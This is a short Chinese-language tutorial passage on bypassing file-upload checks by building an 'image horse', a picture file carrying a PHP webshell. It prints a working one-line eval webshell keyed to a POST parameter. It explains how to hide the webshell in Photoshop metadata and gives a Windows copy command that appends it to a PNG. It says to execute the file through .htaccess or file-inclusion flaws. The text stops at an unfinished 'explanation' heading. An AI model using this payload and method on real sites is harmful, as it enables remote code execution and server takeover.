一、文件内容检测
解析漏洞定义
控制文件是否被当做后端脚本处理
二、图片马绕过
图片马;在图片中包含一句话木马。利用解析漏洞如.htaccess 或文件包含漏洞,对图片马进行解析,执行其中的恶意代码。优势在于可以绕过多种防护机制。
三、图片马制作方法:
# 一句话马示例
<?php @eval($_POST["pass"]);?>1)使用Photoshop(ps),选择“文件”->“文件简介”,在文档标题或者作者处写入一句话木马。
2)使用cmd命令行制作
先准备一张图片(随便截图搞一张就好),然后准备一个一句话马的php文件
# 在window下生成图片木马
copy a.png /b + post.php /a webshell.png解释:
